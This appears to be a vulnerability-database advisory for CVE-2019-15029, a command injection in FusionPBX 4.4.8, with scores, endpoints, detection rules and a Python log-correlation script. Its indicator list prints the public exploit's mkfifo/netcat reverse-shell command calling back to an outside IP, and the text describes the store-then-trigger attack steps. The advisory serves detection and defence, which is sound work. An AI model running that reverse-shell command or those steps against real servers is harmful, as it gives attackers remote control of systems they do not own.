CVE-2019-15029
published 2019-09-05


Priority: P2 68 (high)
CVSS 3.0: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 12.32% (95.7th percentile)
FusionPBX 4.4.8 allows an attacker to execute arbitrary system commands by submitting a malicious command to the service_edit.php file (which will insert the malicious command into the database). To trigger the command, one needs to call the services.php file via a GET request with the service id followed by the parameter a=start to execute the stored command.

Affected (1 range)

Vendor    | Product   | Version range | Fixed in
fusionpbx | fusionpbx | -             | -

Detection & IOCs (extracted from sources)

path: /app/services/service_edit.php
path: /app/services/services.php
url: /app/services/services.php?id=<sid>&a=start
command: rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z
  • Detect POST requests to service_edit.php containing a `service_cmd_start` parameter — this is the injection point where arbitrary OS commands are stored in the database.
  • Detect GET requests to services.php with both an `id` parameter and `a=start` query parameter — this is the trigger that executes the stored command.
  • Alert on the named service `PwnedService3` appearing in FusionPBX service listings or database entries, as it is the default service name used by the public exploit.
  • Monitor for mkfifo-based reverse shell patterns (mkfifo + /bin/sh + nc) spawned by the FusionPBX web process, indicative of successful exploitation.
  • The exploit authenticates first via POST to /core/user_settings/user_dashboard.php before proceeding; a login followed immediately by a POST to service_edit.php and then a GET to services.php?a=start is a high-fidelity attack sequence to correlate.
  • The exploit requires valid credentials to FusionPBX before it can inject the malicious command; exploitation is authenticated, so credential compromise or weak/default passwords are a prerequisite.
  • The reverse-shell IP (172.0.1.3) and port (1337) in the public PoC are attacker-controlled placeholders; real-world attacks will use different callback addresses — do not rely on these specific values for detection.
  • The exploit was tested on Ubuntu 18.04 / PHP 7.2; detection and impact may vary on other OS/PHP combinations.
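The store-then-trigger sequence above can be correlated from the web server's access log alone. The following is an added example (not from this page or from FusionPBX) that runs over constructed combined-format log lines; the log format, client IPs, timestamps and service id `7f2c` are assumptions, and the POST body (where `service_cmd_start` travels) is not visible in an access log, so the store stage is keyed on the path only.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not real traffic), combined log format.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2019:10:00:01 +0000] "POST /core/user_settings/user_dashboard.php HTTP/1.1" 302 0
10.0.0.5 - - [05/Sep/2019:10:00:03 +0000] "POST /app/services/service_edit.php HTTP/1.1" 302 0
10.0.0.5 - - [05/Sep/2019:10:00:05 +0000] "GET /app/services/services.php?id=7f2c&a=start HTTP/1.1" 200 512
10.0.0.9 - - [05/Sep/2019:10:01:00 +0000] "GET /app/services/services.php?id=12&a=stop HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

def parse_line(line):
    """Parse one access-log line into a dict with path and query split out, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    u = urlparse(ev["target"])
    ev["path"], ev["query"] = u.path, parse_qs(u.query)
    return ev

def classify(ev):
    """Map one request to a stage of the CVE-2019-15029 chain, or None if unrelated."""
    if ev["method"] == "POST" and ev["path"].endswith("/core/user_settings/user_dashboard.php"):
        return "login"
    if ev["method"] == "POST" and ev["path"].endswith("/app/services/service_edit.php"):
        return "store"      # injection point; the service_cmd_start body is not logged here
    if (ev["method"] == "GET" and ev["path"].endswith("/app/services/services.php")
            and "id" in ev["query"] and ev["query"].get("a") == ["start"]):
        return "trigger"    # execution of the stored command
    return None

def find_chains(log_text):
    """Return (ip, timestamp, login_seen) for every trigger preceded by a store from the same IP."""
    stages, hits = {}, []
    for line in log_text.splitlines():
        ev = parse_line(line)
        stage = classify(ev) if ev else None
        if stage is None:
            continue
        seen = stages.setdefault(ev["ip"], [])
        seen.append(stage)
        if stage == "trigger" and "store" in seen:
            hits.append((ev["ip"], ev["ts"], "login" in seen))
    return hits
```

A lone `a=start` request from an administrator is normal; the alert-worthy event is the store immediately followed by the trigger from the same client, which is why `find_chains` only reports on that pair.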

CVSS provenance

NVD, CVSS v3.0: 8.8 HIGH, CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 9.0 CRITICAL, AV:N/AC:L/Au:S/C:C/I:C/A:C